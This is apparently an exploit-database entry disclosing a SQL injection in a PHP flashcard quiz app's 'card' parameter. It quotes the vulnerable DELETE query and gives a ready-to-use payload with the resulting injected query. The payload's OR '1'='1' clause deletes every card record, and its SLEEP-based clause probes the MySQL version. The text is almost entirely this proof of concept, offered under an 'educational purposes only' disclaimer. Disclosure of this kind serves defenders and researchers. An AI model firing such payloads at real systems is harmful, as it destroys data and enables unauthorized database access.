Exploits / Vulnerability Discovered : 2024-02-26 |
Type : remote |
Platform : php
This exploit / vulnerability Flashcard quiz app v1.0 card sql injection is for educational purposes only and if it is used you will do on your own risk!
The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
## Proof of Concept (PoC):
This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.
1. Original Code:
$card = $_GET['card'];
$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
2. Payload:
' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
3. Injected Query:
DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --